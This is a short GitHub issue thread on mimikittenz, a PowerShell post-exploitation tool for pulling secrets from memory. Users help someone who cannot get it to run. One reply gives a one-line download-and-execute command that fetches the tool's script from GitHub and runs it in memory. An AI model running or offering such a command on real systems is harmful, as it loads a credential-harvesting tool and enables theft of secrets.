orlyjamie / mimikittenz

A post-exploitation powershell tool for extracting juicy info from memory.
1.82k stars 334 forks source link

NO WORK!!!... #14

Open gearcapitan opened 7 years ago

gearcapitan commented 7 years ago

91195d4f383006e64d514a1ad0ede1e7 HOW TO FIX?

gearcapitan commented 7 years ago

kali 2016-2016-10-18-18-51-31

clock-workorange commented 7 years ago

gearcapitan i don't see any import-module Invoke-mimikittenz.ps1?

you already did it?

gearcapitan commented 7 years ago

da193ce508ea2454a109670ff4ebbdcf

gearcapitan commented 7 years ago

3345aa7d91f631043af3f417f15e3a7b

clock-workorange commented 7 years ago

just do this PS> Import-Module .\Invoke-mimikittenz.ps1 PS> Invoke-mimikittenz

nixawk commented 7 years ago

@gearcapitan

PS C:\Users\test> IEX (New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1")
PS C:\Users\test> Invoke-mimikittenz

or

PS C:\Users\test\Desktop> . .\Invoke-mimikittenz.ps1  # double dots
PS C:\Users\test\Desktop> Invoke-mimikittenz
gearcapitan commented 7 years ago

nothing happens baa1aca2fd9962d9c04b34274f8860db

gearcapitan commented 7 years ago

b3e3aeb113447b249edc116f5420f4354444444444444

clock-workorange commented 7 years ago

that's another issue BTW this one is """fixed"""

just try to learn a little bit more of powershell.... and review your github link the first photo show that you don't get the RAW file from github.... and @nixawk do it right 👍